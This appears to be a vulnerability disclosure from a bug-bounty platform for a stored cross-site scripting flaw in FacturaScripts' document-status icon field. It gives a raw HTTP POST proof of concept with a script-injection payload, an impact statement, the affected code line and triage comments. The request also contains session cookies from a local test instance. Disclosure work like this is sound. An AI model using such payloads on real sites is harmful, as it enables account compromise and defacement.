Stored XSS in EditEstadoDocumento in neorazorx/facturascripts
Valid
Reported on
Jun 21st 2022
Description
In facturascripts/EditEstadoDocumento, the field Icon can be injected an XSS payload into it.
Proof of Concept
// PoC.js
POST /facturascripts/EditEstadoDocumento?code=27&action=save-ok HTTP/1.1
Host: 127.0.0.1
Content-Length: 1224
Cache-Control: max-age=0
sec-ch-ua: "-Not.A/Brand";v="8", "Chromium";v="102"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryyI8BCGNBzwLmaAy8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/facturascripts/EditEstadoDocumento?code=26&action=save-ok
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: fsNick=admin; fsLogkey=hMNEoHuTcDfqZY9OK5b8tG7SW4pUliLFrQkdaBxjCzmJR6gXPnAse2I0Vwy13v; fsLang=en_EN; fsCompany=1; MANTIS_STRING_COOKIE=074c946191216c6d308b8d38e9569cfdef504077558ca4e138964772efb3b87f; MANTIS_PROJECT_COOKIE=0; ucp_tabs=2; __stripe_mid=31234598-f1c7-427c-b5cd-9312a98b0b98b9519b; cookie_token=1c39db291b76e38db9e55ed6f02a77b65ae952140787ee0282a0f7880a7935ca; cpg16x_data=YTo2OntzOjI6IklEIjtzOjMyOiI0MmNlNzEwM2M5OTM5NDNjYTIwMDM2YmRkYmM2NTMxOSI7czoyOiJhbSI7aTowO3M6NDoibGFuZyI7czoxMDoiY2hpbmVzZV9nYiI7czo2OiJzZWFyY2giO2E6Mjp7czo2OiJwYXJhbXMiO2E6Njp7czo4OiJrZXl3b3JkcyI7czoyOiJvbiI7czo1OiJ0aXRsZSI7czoyOiJvbiI7czo3OiJjYXB0aW9uIjtzOjI6Im9uIjtzOjQ6InR5cGUiO3M6MzoiQU5EIjtzOjEwOiJuZXdlcl90aGFuIjtzOjA6IiI7czoxMDoib2xkZXJfdGhhbiI7czowOiIiO31zOjY6InNlYXJjaCI7czozOiJzdmciO31zOjM6ImxpdiI7YToxOntpOjA7czoyOiI4NSI7fXM6MTM6InVwbG9hZF9tZXRob2QiO3M6MTA6InVwbG9hZF9zZ2wiO30%3D; elggperm=zG9jJWU92GZ03ft0yoDFuZ0zhBSb9YvA; Elgg=eftlmmmmdr4oamet41e1le100e
Connection: close
------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="action"
insert
------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="activetab"
EditEstadoDocumento
------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="code"
------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="multireqtoken"
5ebd6335e1917c1e3191a32f6b4be8fd9a5d8c71|1VDJp6
------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="idestado"
------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="nombre"
33
------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="tipodoc"
PresupuestoCliente
------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="actualizastock"
33
------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="generadoc"
------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="icon"
'"><script>alert(/xss/);</script><'"2
------WebKitFormBoundaryyI8BCGNBzwLmaAy8
Content-Disposition: form-data; name="editable"
TRUE
------WebKitFormBoundaryyI8BCGNBzwLmaAy8--
Impact
This vulnerability has the potential to deface websites, result in compromised user accounts, and can run malicious code on web pages, which can lead to a compromise of the user’s device.
Occurrences
EstadoDocumento.php L141
$this->icon = $this->toolBox()->utils()->noHtml($this->icon);
We are processing your report and will contact the
neorazorx/facturascripts
team within 24 hours.
a year ago
The researcher's credibility has increased: +7
The fix bounty has been dropped
This vulnerability will not receive a CVE
EstadoDocumento.php#L141
has been validated
@iohehe - we can proceed with a CVE if the maintainer is happy to do so :)
to join this conversation